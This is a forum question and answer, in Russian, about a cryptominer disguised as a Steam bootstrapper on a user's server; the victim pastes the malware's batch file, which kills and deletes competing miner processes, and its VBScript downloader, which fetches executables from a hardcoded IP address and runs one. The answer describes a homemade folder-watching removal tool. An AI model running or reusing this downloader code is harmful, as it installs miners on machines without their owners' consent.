Как навсегда убить Steam клиента начальной загрузки

Question

У меня в диспетчере задач следующая ситуация:

Я не знаю, какое это приложение, но определенно не загрузчик клиента Steam, потому что я его не установил и тоже не могу удалить.

Если я попытаюсь выяснить, что это за приложение, через этот шаг:

Я вижу что-то вроде этого:

В утилите MS Config я не нашел ничего похожего на secury.exe .

Когда я открываю местоположение файла, я вижу три файла:

m.bat , b.exe , 4.vbs .

Ниже приведено содержание m.bat:

taskkill /f /t /im secury.exe
c:\ProgramData\secury.exe
taskkill /f /t /im kingsoft.exe
taskkill /f /t /im expl0rer.exe
taskkill /f /t /im ieplare.exev
taskkill /f /t /im nssm.exe
taskkill /f /t /im MSASCui.exe
taskkill /f /t /im SystemSettlngs.exe
taskkill /f /t /im SystemSetting.exe
taskkill /f /t /im Process.exe
taskkill /f /t /im winlnlt.exe
taskkill /f /t /im WindowsUpgrade.exe
taskkill /f /t /im msdc.exe
taskkill /f /t /im Fiddlere.exe
taskkill /f /t /im shovst.exe
taskkill /f /t /im lqrtqe.exe
taskkill /f /t /im apkls.exe
taskkill /f /t /im winlog.exe
taskkill /f /t /im svchosts.exe
taskkill /f /t /im win1ogins.exe
taskkill /f /t /im shovsts.exe
taskkill /f /t /im fcty.exe
taskkill /f /t /im soiuos.exe
taskkill /f /t /im TrustedInstaller.exe
del C:\Windows\System32\soiuos.exe
del C:\Windows\Setup\TrustedInstaller.exe
del C:\ProgramData\kingsoft.exe
del C:\ProgramData\expl0rer.exe
del C:\ProgramData\ieplare.exe
del C:\ProgramData\nssm.exe
del C:\ProgramData\MSASCui.exe
del C:\ProgramData\SystemSettlngs.exe
del C:\ProgramData\SystemSetting.exe
del C:\ProgramData\Process.exe
del C:\ProgramData\winlnlt.exe
del C:\ProgramData\WindowsUpgrade.exe
del C:\ProgramData\msdc.exe
del C:\ProgramData\Fiddlere.exe
del C:\ProgramData\shovst.exe
del C:\ProgramData\lqrtqe.exe
del C:\ProgramData\apkls.exe
del C:\ProgramData\winlog.exe
del C:\ProgramData\svchosts.exe
del C:\ProgramData\win1ogins.exe
del C:\ProgramData\shovsts.exe
del C:\ProgramData\fcty.exe
del C:\ProgramData\pool.exe
del C:\ProgramData\pool2.exe
del C:\ProgramData\pool3.exe

Далее идет 4.vbs:

Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/2.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\s2.exe",2
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\pool2.exe",2
CreateObject("WScript.Shell").Run "C:\ProgramData\pool3.exe"
CreateObject("WScript.Shell").Run "del C:\ProgramData\pool3.exe"

Что я могу сделать, чтобы остановить secury.exe от злоупотребления вычислительной мощностью моего сервера?

PS Я выполнил полную проверку Avast моего компьютера, но он не нашел ничего плохого.

Answer 1

Я хочу поделиться решением, которое я нашел для своей проблемы.

Как программист, я создал программу, которая постоянно следит за папкой c:\ProgramData\ наличие новых файлов. И если некоторые из файлов, которые принадлежат "начальному загрузчику Steam", появляются внутри этой папки, моя программа удаляет эти файлы, прежде чем они будут выполнены. Если кому-то нужно изменить эту утилиту, вы можете найти ее на GitHub.

После того, как я запустил этот примитивный антивирус (на самом деле antiPUP), моя система перестала работать медленно. Еще одна деталь, которая требуется для работы этой программы со стабильностью, - это требование создать папку c:\ProgramData\copyForVirus\ . Я создал программу для создания копии этих вирусных файлов, чтобы затем проанализировать их в какой-то еще среде VM Ware и выяснить, что является внутренним содержимым этих файлов.